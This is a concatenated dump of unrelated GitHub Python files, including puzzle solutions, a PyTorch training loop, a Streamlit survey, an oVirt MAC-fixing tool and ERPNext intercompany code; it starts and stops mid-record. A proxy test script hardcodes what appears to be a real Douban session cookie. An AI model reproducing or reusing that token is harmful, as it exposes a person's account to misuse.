signal.signal(signal.SIGINT, signal.SIG_DFL)\n Gtk.main()\n\n\nif __name__ == \"__main__\":\n licht_applet = LichtApplet()\n","repo_name":"phdenzel/licht","sub_path":"licht/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":14512,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"5714180063","text":"def parse(line):\n op, coords = line.split()\n x, y, z = map(lambda b: (int(b[0]), int(b[1])), map(lambda a: a[2 : ].split(\"..\"), coords.split(\",\")))\n # print(op, op == \"on\")\n return (op == \"on\", (x, y, z))\n\nwith open(\"input\") as f:\n data = [parse(line) for line in f.readlines() if line]\n# print(data)\ncube = [[[False] * 101 for _ in range(101)] for _ in 
range(101)]\n\nfor line in data:\n op, (x, y, z) = line\n for i in range(max(x[0], -50), min(x[1], 50) + 1):\n for j in range(max(y[0], -50), min(y[1], 50) + 1):\n for k in range(max(z[0], -50), min(z[1], 50) + 1):\n # print(op, k + 50, j + 50, i + 50)\n cube[k + 50][j + 50][i + 50] = op\n\nprint(sum(sum(sum(i) for i in j) for j in cube))\n\n","repo_name":"aiviaghost/Advent_of_Code_2021","sub_path":"Day_22/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"31814623423","text":"from typing import List\n\n\nclass Solution1:\n def is_alien_sorted(self, words: List[str], order: str) -> bool:\n order_dict = {}\n for i, s in enumerate(order):\n order_dict[s] = i\n for i in range(1, len(words)):\n for j in range(len(words[i-1])):\n if j == len(words[i]) or order_dict[words[i-1][j]] > order_dict[words[i][j]]:\n return False\n if order_dict[words[i-1][j]] < order_dict[words[i][j]]:\n break\n return True\n\n\nclass Solution2:\n \"\"\" Simplified of Solution1 \n\n Borrow from: https://leetcode.com/problems/verifying-an-alien-dictionary/discuss/203185/JavaC%2B%2BPython-Mapping-to-Normal-Order\n\n \"\"\"\n\n def is_alien_sorted(self, words, order):\n order_dict = {s: i for i, s in enumerate(order)}\n words = [[order_dict[x] for x in word] for word in words]\n return all(word1 < word2 for word1, word2 in zip(words, words[1:]))\n\n\nif __name__ == '__main__':\n words = [\"word\"]\n order = 'worldabcefghijkmnpqstuvxyz'\n ans = Solution1().is_alien_sorted(words, order)\n print(ans)\n","repo_name":"YuhanShi53/Leetcode_Solutions","sub_path":"solutions/Leetcode_953/leetcode_953.py","file_name":"leetcode_953.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"36475446410","text":"import numpy as np\nimport os\nimport torch\nimport torch.nn as nn\nimport torchvision\nimport torch.utils.data as Data\nimport torchvision.datasets as dates\nfrom torch.autograd import Variable\nfrom torch.nn import functional as F\nimport shutil\nimport cv2\nimport tqdm\nfrom einops.einops import rearrange\nimport math\nfrom torchvision import transforms as transforms1\nfrom torch.optim import lr_scheduler\nimport cfgs.config as cfg\nimport dataset.CD_dataset as dates\n\n\n\ndef check_dir(dir):\n if not os.path.exists(dir):\n os.mkdir(dir)\n\nab_test_dir = cfg.SAVE_PATH\ncheck_dir(ab_test_dir)\n\n\n\ndef main():\n\n train_transform_det = dates.Compose([\n dates.Scale(cfg.TRANSFROM_SCALES),\n ])\n val_transform_det = dates.Compose([\n dates.Scale(cfg.TRANSFROM_SCALES),\n ])\n\n train_data = dates.Dataset(cfg.TRAIN_DATA_PATH,cfg.TRAIN_LABEL_PATH,\n cfg.TRAIN_TXT_PATH,'train',transform=True,\n transform_med = train_transform_det)\n train_loader = Data.DataLoader(train_data,batch_size=cfg.BATCH_SIZE,\n shuffle= True, num_workers= 4, pin_memory= True)\n val_data = dates.Dataset(cfg.VAL_DATA_PATH,cfg.VAL_LABEL_PATH,\n cfg.VAL_TXT_PATH,'val',transform=True,\n transform_med = val_transform_det)\n val_loader = Data.DataLoader(val_data, batch_size= cfg.BATCH_SIZE,\n shuffle= False, num_workers= 4, pin_memory= True)\n # build model\n import model as models\n device = torch.device(\"cuda:0\")\n model = models.Change_detection()\n\n model= nn.DataParallel(model, device_ids = cfg.gpu_ids)\n model.to(device)\n\n # Cross entropy loss\n MaskLoss = torch.nn.CrossEntropyLoss().to(device)\n\n # Optimizer\n optimizer = 
torch.optim.SGD(model.parameters()\n ,lr=cfg.INIT_LEARNING_RATE,momentum=cfg.MOMENTUM,weight_decay=cfg.DECAY)\n\n # Scheduler, For each 50 epoch, decay 0.1\n scheduler = lr_scheduler.StepLR(optimizer, step_size=50, gamma=0.1)\n\n\n print(\"train_loader\", len(train_loader))\n print(\"val_loader\", len(val_loader))\n loss_pre = 100000\n\n \n for epoch in range(cfg.MAX_ITER):\n print(\"epoch\", epoch, \"learning rate: \", optimizer.param_groups[0]['lr'])\n model.train()\n # Start to train\n for batch_idx, batch in tqdm.tqdm(enumerate(train_loader)):\n step = epoch * len(train_loader) + batch_idx\n img1_idx,img2_idx,label_idx, filename,height,width = batch\n \n\n img1 = img1_idx.to(device)\n img2 = img2_idx.to(device)\n label = label_idx.to(device) \n \n \n output_map = model(img1, img2)\n b_num = output_map.shape[0]\n gt = Variable(dates.resize_label(label.data.cpu().numpy(), \\\n size=output_map.data.cpu().numpy().shape[2:]).to(device)) \n\n loss = MaskLoss(output_map, gt.long())\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (batch_idx) % 100 == 0:\n print(\" Epoch [%d/%d] Loss: %.4f \" % (epoch, batch_idx,loss.item()))\n loss_total = 0\n\n # Start to validate\n for batch_idx, batch in tqdm.tqdm(enumerate(val_loader)):\n with torch.no_grad():\n img1_idx,img2_idx,label_idx, filename,height,width = batch\n img1 = Variable(img1_idx.to(device))\n img2 = Variable(img2_idx.to(device))\n label = Variable(label_idx.to(device))\n output_map = model(img1, img2)\n gt = Variable(dates.resize_label(label.data.cpu().numpy(), \\\n size=output_map.data.cpu().numpy().shape[2:]).to(device))\n loss = MaskLoss(output_map, gt.long())\n #loss = MaskLoss(output_map, gt.float())\n loss_total = loss_total + loss\n scheduler.step()\n print(\"loss_total\", loss_total)\n print(\"loss_pre\", loss_pre)\n if loss_total < loss_pre: \n loss_pre = loss_total\n torch.save({'state_dict': model.state_dict()}, os.path.join(ab_test_dir, 'model_best.pth'))\n\n if epoch % 10 == 0:\n torch.save({'state_dict': model.state_dict()}, os.path.join(ab_test_dir, 'model' + str(epoch) + '.pth'))\n \n\nif __name__ == '__main__':\n main()\n\n","repo_name":"f64051041/SARAS-Net","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"57"} +{"seq_id":"1220290403","text":"# -*- coding:utf-8 -*-\nimport urllib\nfrom urllib import request\n\nfrom common.IPUtils import get_IP_list\n\n__author__ = 'zhennehz'\n\nif __name__ == \"__main__\":\n #get_IP_list()\n '''\n # 访问网址\n url = 'https://ip.cn/'\n # 这是代理IP\n # 这是代理IP\n proxy = {'https': '113.239.226.245:80'}\n # 创建ProxyHandler\n proxy_support = request.ProxyHandler(proxy)\n # 创建Opener\n opener = request.build_opener(proxy_support)\n # 添加User Angent\n opener.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36')]\n # 安装OPener\n # request.install_opener(opener)\n # 使用自己安装好的Opener\n # response = request.urlopen(url)\n # 如果不想安装也可以直接使用opener来执行\n response = opener.open(url)\n # 读取相应信息并解码\n html = response.read().decode(\"utf-8\")\n # 打印信息\n html = BeautifulSoup(html, 'html.parser')\n print(html.select(\"#result\"))\n '''\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36',\n 'Cookie': 'gr_user_id=1f9ea7ea-462a-4a6f-9d55-156631fc6d45; bid=vPYpmmD30-k; ll=\"118282\"; 
ue=\"codin; __utmz=30149280.1499577720.27.14.utmcsr=douban.com|utmccn=(referral)|utmcmd=referral|utmcct=/doulist/240962/; __utmv=30149280.3049; _vwo_uuid_v2=F04099A9dd; viewed=\"27607246_26356432\"; ap=1; ps=y; push_noty_num=0; push_doumail_num=0; dbcl2=\"30496987:gZxPfTZW4y0\"; ck=13ey; _pk_ref.100001.8cb4=%5B%22%22%2C%22%22%2C1515153574%2C%22https%3A%2F%2Fbook.douban.com%2Fmine%22%5D; __utma=30149280.833870293.1473539740.1514800523.1515153574.50; __utmc=30149280; _pk_id.100001.8cb4=255d8377ad92c57e.1473520329.20.1515153606.1514628010.'\n }\n\n url = \"https://ip.cn/\"\n\n user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'\n # 设置代理 IP,http 不行,使用 https\n proxy = request.ProxyHandler({'https': '114.7.15.146:8080'})\n auth = request.HTTPBasicAuthHandler()\n # 构造 opener\n opener = request.build_opener(proxy, auth, request.HTTPHandler)\n # 添加 header\n opener.addheaders = [('User-Agent', user_agent)]\n # 安装 opener\n request.install_opener(opener)\n # 打开链接\n req = urllib.request.Request(url, None, headers)\n\n conn = request.urlopen(req)\n # 以 utf-8 编码获取网页内容\n content = conn.read().decode('utf-8')\n # 输出\n print(content)\n","repo_name":"yyfuzhen/mapspider","sub_path":"test/testproxies.py","file_name":"testproxies.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"57"} +{"seq_id":"34093295521","text":"import time\r\nimport pandas as pd\r\nimport streamlit as st\r\n\r\ninflobj = open('file.txt', 'r', encoding='utf-8')\r\n\r\ndata = inflobj.read()\r\ninflobj.close()\r\n\r\nst.title(\"2-6 MBTI 설문조사\")\r\nnum = st.number_input(\"학번을 입력해주세요\", min_value=20601, max_value=20626)\r\n\r\nbox = st.text_input(label=\"이름(3글자)을 입력해주세요\")\r\n\r\nradfirst = st.radio(\"MBTI 첫번째 자리\", ('I', 'E'))\r\nradsecond = st.radio(\"MBTI 두번째 자리\", ('N', 'S'))\r\nradthird = st.radio(\"MBTI 세번째 자리\", ('T', 'F'))\r\nradfourth = st.radio(\"MBTI 네번째 자리\", ('J', 'P'))\r\n\r\ndef chart(data):\r\n c = \"IE NS TF JP\"\r\n cl = c.split(\" \")\r\n op = []\r\n for i in range(16):\r\n bina = str(bin(i))[2:]\r\n x = \"0\" * (4 - len(bina)) + bina\r\n print(x)\r\n #list = list(x)\r\n result = []\r\n for j in range(0, 4):\r\n print(int(x[j]))\r\n result.append(str(cl[j][int(x[j])]))\r\n op.append(\"\".join(result))\r\n\r\n print(op)\r\n\r\n amount = []\r\n for i in range(16):\r\n amount.append(data.count(op[i]))\r\n\r\n\r\n #lst = \"INTJ INTP INFJ INFP ISTJ ISTP ISFP\"\r\n\r\n chart_data = pd.DataFrame(\r\n amount, index=op)\r\n st.bar_chart(chart_data)\r\n\r\ndef chartb(data):\r\n c = list(\"IENSTFJP\")\r\n amount = []\r\n for i in range(8):\r\n amount.append(data.count(c[i]))\r\n\r\n chartb_data = pd.DataFrame(\r\n amount, index=c)\r\n st.bar_chart(chartb_data)\r\n\r\nif st.button(\"제출\"):\r\n if 20600 < num < 20627 and len(box) == 3:\r\n mbti = radfirst + radsecond + radthird + radfourth\r\n wri = str(num) + \" \" + str(box) + \" : \" + mbti + \" - \"\r\n if wri not in data:\r\n inflobj = open('file.txt', 'a', encoding='utf-8')\r\n\r\n\r\n inflobj.write(wri + str(time.time()) + '\\n')\r\n inflobj.close()\r\n\r\n inflobj = open('file.txt', 'r', encoding='utf-8')\r\n output = inflobj.read()\r\n inflobj.close()\r\n\r\n st.code(output)\r\n a = st.caption(\"-------------------------\\n총\" + str(output.count(\"\\n\")) + \"명이 설문조사에 참여했습니다\")\r\n chart(output)\r\n chartb(output)\r\n else:\r\n st.caption(\"중복되는 데이터가 있습니다\")\r\n st.code(data)\r\n chart(data)\r\n chartb(data)\r\n else:\r\n st.caption(\"학번이나 이름이 잘못 입력되었습니다\")\r\n st.code(data)\r\n 
chart(data)\r\n chartb(data)\r\n\r\nelse:\r\n st.code(data)\r\n\r\n st.caption(\"-------------------------\\n총\" + str(data.count(\"\\n\")) + \"명이 설문조사에 참여했습니다\")\r\n\r\n chart(data)\r\n chartb(data)\r\n\r\nst.caption(\"Made by 민경현\")\r\n","repo_name":"mineu1/mbti","sub_path":"mbti.py","file_name":"mbti.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"70900173297","text":"from .classes import SystemState\nfrom .servo import initialize as servoInitialize\nimport yaml\n\n\ndef initialize():\n with open(\"./limb/config.yml\") as f:\n configData = yaml.safe_load(f)\n\n systemSTATE = SystemState()\n # get config from config.yml\n servoPins = configData[\"servoPins\"]\n systemSTATE.servoDict = servoInitialize(servoPins)\n if systemSTATE.check_initialized() is False:\n raise Exception(\"System not initialized.\")\n return systemSTATE\n","repo_name":"Augmentation-Lab/limbX","sub_path":"limb/utilities/servoDict.py","file_name":"servoDict.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"34541850265","text":"from __future__ import print_function\nfrom __future__ import absolute_import\n\nimport os\n\nfrom mig.shared.fileio import pickle, unpickle\nfrom mig.shared.conf import get_configuration_object\n\n\ndef initialize_and_get_display_dict_filename(configuration, logger):\n filename = os.path.join(configuration.mig_server_home, 'livedisplaysdict')\n if os.path.isfile(filename):\n return (True, filename)\n logger.info('display dict file %s not found, pickling a new with {} as only content'\n % filename)\n\n dict = {}\n pickle_status = pickle(dict, filename, logger)\n if not pickle_status:\n return (False, 'could not pickle %s when initializing'\n % filename)\n return (True, filename)\n\n\ndef get_users_display_number(client_id, configuration, logger):\n (init_ret, filename) = \\\n initialize_and_get_display_dict_filename(configuration, logger)\n if not init_ret:\n return (False, 'could not initialize')\n\n (key, value) = get_users_display_dict(client_id, configuration,\n logger)\n\n if not key:\n logger.error(value)\n return False\n return key\n\n\ndef get_users_display_dict(client_id, configuration, logger):\n (init_ret, filename) = \\\n initialize_and_get_display_dict_filename(configuration, logger)\n if not init_ret:\n return (False, 'could not initialize')\n\n dict = unpickle(filename, logger)\n if dict is False:\n return (False, 'could not unpickle %s' % filename)\n\n for (key, value) in dict.items():\n if value['client_id'] == client_id:\n return (key, value)\n\n # not found, client_id does not have a live display\n\n return (-1, -1)\n\n\ndef set_user_display_inactive(\n client_id,\n display_number,\n configuration,\n logger,\n):\n\n (init_ret, filename) = \\\n initialize_and_get_display_dict_filename(configuration, logger)\n if not init_ret:\n return (False, 'could not initialize')\n\n current_display = get_users_display_number(client_id,\n configuration, logger)\n if not current_display:\n return (False,\n 'could not remove active display since no entry was found for %s'\n % client_id)\n\n if current_display == -1:\n return (False,\n 'user %s does not have a display registered, unable to inactivate any display'\n % client_id)\n\n if current_display != display_number:\n return (False,\n 'user %s had display %s registered in dict, but specified display_number in 
set_user_display_inactive was %s'\n                % (client_id, current_display, display_number))\n\n    # remove entry from dict and pickle it\n\n    dict = unpickle(filename, logger)\n    if dict is False:\n        return (False, 'could not unpickle %s' % filename)\n\n    if display_number not in dict:\n        return (False, 'display %s not found in dict' % display_number)\n    try:\n        del dict[display_number]\n    except Exception as e:\n        return (False,\n                'exception trying to remove %s from display dict. Exception %s'\n                % (display_number, e))\n\n    pickle_status = pickle(dict, filename, logger)\n\n    if not pickle_status:\n        return (False, 'could not pickle %s when removing %s'\n                % (filename, display_number))\n    return (True, '')\n\n\ndef get_dict_from_display_number(display_number, configuration, logger):\n    (init_ret, filename) = \\\n        initialize_and_get_display_dict_filename(configuration, logger)\n    if not init_ret:\n        return (False, 'could not initialize')\n\n    dict = unpickle(filename, logger)\n    if dict is False:\n        print('dict is %s false' % dict)\n        return (False, 'could not unpickle %s' % filename)\n\n    if display_number in dict:\n        return (display_number, dict[display_number])\n    else:\n        return (True, -1)\n\n\ndef set_user_display_active(\n    client_id,\n    display_number,\n    vnc_port,\n    password,\n    configuration,\n    logger,\n    ):\n\n    (init_ret, filename) = \\\n        initialize_and_get_display_dict_filename(configuration, logger)\n    if not init_ret:\n        return (False, 'could not initialize')\n\n    (dis_ret, dis_dict) = get_dict_from_display_number(display_number,\n            configuration, logger)\n    if not dis_ret:\n        return (False, 'dict error, %s' % dis_dict)\n    if dis_dict != -1:\n        if dis_dict['client_id'] != client_id:\n\n            # display occupied by another user!\n\n            return (False, 'display %s already in use by another user!'\n                    % display_number)\n\n    # getting here means display is free or used by client_id\n\n    dict = unpickle(filename, logger)\n    if dict is False:\n        return (False, 'could not unpickle %s' % filename)\n\n    current_display = get_users_display_number(client_id,\n            configuration, logger)\n    if not current_display:\n\n        # register display\n\n        dict[display_number] = {'client_id': client_id,\n                                'vnc_port': vnc_port,\n                                'password': password}\n        pickle_status = pickle(dict, filename, logger)\n\n        if not pickle_status:\n            return (False, 'could not pickle %s when adding %s'\n                    % (filename, dict[display_number]))\n        logger.info('successfully registered that display %s is in use by %s in %s'\n                     % (display_number, client_id, filename))\n        return (True, '')\n\n    if current_display != display_number and current_display != -1:\n\n        # problems..\n\n        return (False,\n                'set_user_display_active met a conflict, can not set display %s when user already has %s registered'\n                % (display_number, current_display))\n    else:\n\n        # add display to dict\n\n        dict[display_number] = {'client_id': client_id,\n                                'vnc_port': vnc_port,\n                                'password': password}\n        pickle_status = pickle(dict, filename, logger)\n\n        if not pickle_status:\n            return (False, 'could not pickle %s when adding %s'\n                    % (filename, dict[display_number]))\n\n        logger.info('successfully registered that display %s is in use by %s in %s %s'\n                    % (display_number, client_id, dict, filename))\n        return (True, '')\n\n\n# test of functions\n\nif '__main__' == __name__:\n    print('*** Testing livedisplayfunctions ***')\n\n    # from mig.shared.cgishared import init_cgiscript_possibly_with_cert\n    # (logger, configuration, client_id, o) = init_cgiscript_possibly_with_cert()\n\n    client_id = 'Henrik_Hoey_Karlsen3'\n    configuration = get_configuration_object()\n    
logger = configuration.logger\n (stat, msg) = get_users_display_dict(client_id, configuration,\n logger)\n print('users_display_dict status: %s, msg: %s' % (stat, msg))\n","repo_name":"ucphhpc/migrid-sync","sub_path":"mig/shared/livedisplaysfunctions.py","file_name":"livedisplaysfunctions.py","file_ext":"py","file_size_in_byte":6897,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"17728416773","text":"import argparse\nimport contextlib\nimport getpass\nimport logging\nimport sys\n\nfrom collections import defaultdict\n\nimport ovirtsdk4 as sdk\nimport ovirtsdk4.types as types\n\n\nclass VmEntry(object):\n def __init__(self, vm, nic):\n self.vm_id = vm.id\n self.vm_name = vm.name\n self.vm_status = vm.status\n self.vm_cluster = vm.cluster.id\n self.nic_id = nic.id\n self.nic_name = nic.name\n self.nic_plugged = nic.plugged\n\n\ndef main():\n args = _parse_args()\n _setup_logging()\n log = logging.getLogger()\n connection = sdk.Connection(\n url=args.url,\n username=args.user,\n password=getpass.getpass('Please enter user password: '),\n ca_file=args.ca if args.ca else None,\n insecure=False if args.ca else True,\n debug=args.debug,\n log=log\n )\n vms_service = connection.system_service().vms_service()\n allowed_clusters = _get_allowed_clusters(connection, args.data_center)\n if not allowed_clusters:\n log.error(\"No clusters found, check data-center argument.\")\n\n with contextlib.closing(connection):\n for loop in range(0, args.loop):\n log.info(\"Starting iteration %d\", loop)\n mac_vms = _find_show_duplicates(vms_service, allowed_clusters)\n if mac_vms and not args.dryrun:\n _fix_duplicates(vms_service, allowed_clusters, mac_vms)\n\n\ndef _setup_logging():\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M',\n filename='macs.log',\n filemode='w')\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n formatter = logging.Formatter('%(levelname)-8s : %(message)s')\n console.setFormatter(formatter)\n logging.getLogger('').addHandler(console)\n\n\ndef _build_mac_vms(vms_service, allowed_clusters):\n mac_vms = defaultdict(set)\n for vm in vms_service.list():\n if vm.cluster.id not in allowed_clusters:\n continue\n for nic in vms_service.vm_service(vm.id).nics_service().list():\n entry = VmEntry(vm, nic)\n mac_vms[nic.mac.address].add(entry)\n return {mac: vm for mac, vm in mac_vms.iteritems() if len(vm) > 1}\n\n\ndef _can_fix_duplicate(mac, vms, allowed_clusters):\n log = logging.getLogger()\n _CANTFIX_MSG = 'Cannot fix MAC %s automatically,'\n _REASON_PLUG = 'more than 1 VM with NIC plugged is not DOWN'\n CANTFIX_PLUG = '{} {}'.format(_CANTFIX_MSG, _REASON_PLUG)\n if sum(not _down_or_unplugged(vm) for vm in vms) > 1:\n log.warning(CANTFIX_PLUG, mac)\n return False\n return True\n\n\ndef _down_or_unplugged(vm):\n return (vm.vm_status == types.VmStatus.DOWN or not vm.nic_plugged)\n\n\ndef _find_show_duplicates(vms_service, allowed_clusters):\n log = logging.getLogger()\n mac_vms = _build_mac_vms(vms_service, allowed_clusters)\n if not mac_vms:\n log.info(\"No duplicate MACs found\")\n else:\n log.info(\"Duplicate MACs found:\")\n _show_duplicate(mac_vms)\n return mac_vms\n\n\ndef _fix_duplicates(vms_service, allowed_clusters, mac_vms):\n log = logging.getLogger()\n for mac in mac_vms:\n if not _can_fix_duplicate(mac, mac_vms[mac], allowed_clusters):\n continue\n log.info(\"Fixing duplicate MAC %s automatically:\", mac)\n for vm in mac_vms[mac]:\n if 
_down_or_unplugged(vm):\n                log.info(\"  Refreshing %s %s\", vm.vm_name, vm.nic_name)\n                _refresh_nic(vms_service, vm)\n\n\ndef _get_allowed_clusters(connection, data_centers):\n    dcs_service = connection.system_service().data_centers_service()\n    clusters_service = connection.system_service().clusters_service()\n    return {c.id for c in clusters_service.list()\n            if dcs_service.data_center_service(c.data_center.id).get().name\n            in data_centers}\n\n\ndef _parse_args():\n    parser = argparse.ArgumentParser(description='Fix duplicate MACs')\n    parser.add_argument('--url', type=str, required=True,\n                        help='API URL (https://example/ovirt-engine/api)')\n    parser.add_argument('--dry-run', dest='dryrun', action='store_true',\n                        help='Do not attempt to fix, just test')\n    parser.add_argument('--debug', dest='debug', action='store_true',\n                        help='Log all API interaction')\n    parser.add_argument('--loop', type=int, default=1,\n                        help='LOOP find and fix iterations')\n    parser.add_argument('--data-center', type=str, default=\"Default\",\n                        help='DATA-CENTER(s) to run (Default)', nargs='+')\n    parser.add_argument('--user', type=str, default=\"admin@internal\",\n                        help='USER to login to RHV-M, (admin@internal)')\n    parser.add_argument('--ca', type=str, default=\"\",\n                        help='PATH to the RHV HTTP CA Certificate (insecure)')\n    return parser.parse_args()\n\n\ndef _refresh_nic(vms_service, vm):\n    nics_service = vms_service.vm_service(vm.vm_id).nics_service()\n    nic = nics_service.nic_service(vm.nic_id).get()\n    nics_service.nic_service(nic.id).remove()\n    nics_service.add(\n        types.Nic(\n            name=nic.name,\n            description=nic.description,\n            vnic_profile=nic.vnic_profile\n        ),\n    )\n\n\ndef _show_duplicate(mac_vms):\n    log = logging.getLogger()\n    for mac in mac_vms:\n        log.info(\"MAC %s is in use by following VMs\", mac)\n        for vm in mac_vms[mac]:\n            log.info(\"  VM %s is %s, nic %s is %s\", vm.vm_name, vm.vm_status,\n                     vm.nic_name, \"plugged\" if vm.nic_plugged else \"unplugged\")\n\n\nif __name__ == '__main__':\n    sys.exit(main() or 0)\n","repo_name":"oVirt/python-ovirt-engine-sdk4","sub_path":"examples/fix_dup_nic_macs.py","file_name":"fix_dup_nic_macs.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"57"} +{"seq_id":"14488758442","text":"\nfrom __future__ import unicode_literals\n\nimport frappe\nfrom frappe import _\n\nfrom frappe.model.mapper import get_mapped_doc\nfrom erpnext.accounts.utils import get_fiscal_year\nfrom erpnext.accounts.doctype.sales_invoice.sales_invoice import SalesInvoice\nfrom chem_intercompany.api import check_counter_series, validate_inter_company_transaction, get_inter_company_details\n\ndef on_submit(self, method):\n\tcreate_purchase_invoice(self)\n\ndef on_trash(self, method):\n\tdelete_all(self)\n\ndef on_cancel(self, method):\n\tcancel_all(self)\n\ndef cancel_all(self):\n\tif self.get('pi_ref'):\n\t\tdoc = frappe.get_doc(\"Purchase Invoice\", self.pi_ref)\n\n\t\tif doc.docstatus == 1:\n\t\t\tdoc.cancel()\n\ndef delete_all(self):\n\tif self.get('pr_ref'):\n\t\tpr_ref = self.pr_ref\n\t\tfrappe.db.set_value(\"Purchase Invoice\", self.pr_ref, 'inter_company_invoice_reference', None)\n\t\tfrappe.db.set_value(\"Purchase Invoice\", self.pr_ref, 'si_ref', None)\n\n\t\tself.db_set(\"pi_ref\", None)\n\t\tself.db_set(\"inter_company_invoice_reference\", None)\n\n\t\tdoc = frappe.get_doc(\"Purchase Invoice\", pr_ref)\n\t\tdoc.delete()\n\ndef create_purchase_invoice(self):\n\tcheck_inter_company_transaction = None\n\n\tif 
frappe.db.exists(\"Company\",self.customer):\n\t\tcheck_inter_company_transaction = frappe.get_value(\n\t\t\t\"Company\", self.customer, \"allow_inter_company_transaction\"\n\t\t)\n\t\n\tif check_inter_company_transaction:\n\t\t\n\t\tcompany = frappe.get_doc(\"Company\", self.customer)\n\t\tinter_company_list = [item.company for item in company.allowed_to_transact_with]\n\t\n\t\tif self.company in inter_company_list:\n\t\t\tpi = make_inter_company_transaction(self)\n\n\t\t\tfor index, item in enumerate(self.items):\n\t\t\t\tif item.delivery_note:\n\t\t\t\t\tpi.items[index].purchase_receipt = frappe.db.get_value(\n\t\t\t\t\t\t\"Delivery Note\",\n\t\t\t\t\t\titem.delivery_note,\n\t\t\t\t\t\t'inter_company_receipt_reference'\n\t\t\t\t\t)\n\n\t\t\t\tif item.sales_order:\n\t\t\t\t\tpi.items[index].purchase_order = frappe.db.get_value(\n\t\t\t\t\t\t\"Sales Order\",\n\t\t\t\t\t\titem.sales_order,\n\t\t\t\t\t\t'inter_company_order_reference'\n\t\t\t\t\t)\n\t\t\n\t\t\t# authority = frappe.db.get_value(\"Company\", pi.company, 'authority')\n\t\t\t\t\n\t\t\t# if authority == \"Unauthorized\" and (not pi.amended_from) and self.si_ref:\n\t\t\t\t\n\t\t\t# \talternate_company = self.alternate_company\n\t\t\t# \tcompany_series = frappe.db.get_value(\"Company\", alternate_company, 'company_series')\n\n\t\t\t# \tpi.company_series = frappe.db.get_value(\"Company\", pi.name, \"company_series\")\n\t\t\t# \tpi.series_value = check_counter_series(pi.naming_series, company_series) - 1\n\t\t\t# \tpi.naming_series = 'A' + pi.naming_series\n\t\t\t\n\t\t\tpi.si_ref = self.name\n\n\t\t\tpi.save()\n\t\t\tif self.update_stock:\n\t\t\t\tpi.db_set('update_stock', 1)\n\t\t\t\n\t\t\tpi.submit()\n\t\t\t\n\t\t\tif self.si_ref:\n\t\t\t\tsi_ref = frappe.db.get_value(\"Sales Invoice\", self.name, 'si_ref')\n\t\t\t\tpi_ref = frappe.db.get_value(\"Sales Invoice\", self.name, 'pi_ref')\n\t\t\t\t\n\t\t\t\tfrappe.db.set_value(\"Purchase Invoice\", pi.name, 'si_ref', self.name)\n\t\t\t\tfrappe.db.set_value(\"Purchase Invoice\", pi_ref, 'si_ref', si_ref)\n\n\t\t\tself.db_set('pi_ref', pi.name)\n\ndef make_inter_company_transaction(self, target_doc=None):\n\tsource_doc = frappe.get_doc(\"Sales Invoice\", self.name)\n\n\tvalidate_inter_company_transaction(source_doc, \"Sales Invoice\")\n\tdetails = get_inter_company_details(source_doc, \"Sales Invoice\")\n\n\tdef set_missing_values(source, target):\n\t\tif self.amended_from:\n\t\t\tname = frappe.db.get_value(\"Purchase Invoice\", {'si_ref': self.amended_from}, \"name\")\n\t\t\ttarget.amended_from = name\n\t\t\n\t\ttarget.company = source.customer\n\t\ttarget.supplier = source.company\n\t\ttarget.buying_price_list = source.selling_price_list\n\n\t\tabbr = frappe.db.get_value(\"Company\", target.company, 'abbr')\n\n\t\ttarget.set_warehouse = \"Stores - {}\".format(abbr)\n\t\ttarget.rejected_warehouse = \"Stores - {}\".format(abbr)\n\n\t\tif source.taxes_and_charges:\n\t\t\ttarget_company_abbr = frappe.db.get_value(\"Company\", target.company, \"abbr\")\n\t\t\tsource_company_abbr = frappe.db.get_value(\"Company\", source.company, \"abbr\")\n\t\t\t\n\t\t\ttaxes_and_charges = source.taxes_and_charges.replace(\n\t\t\t\tsource_company_abbr, target_company_abbr\n\t\t\t)\n\n\t\t\tif frappe.db.exists(\"Purchase Taxes and Charges Template\", taxes_and_charges):\n\t\t\t\ttarget.taxes_and_charges = taxes_and_charges\n\n\t\t\ttarget.taxes = source.taxes\n\t\t\t\n\t\t\tfor index, item in enumerate(source.taxes):\n\t\t\t\ttarget.taxes[index].account_head = 
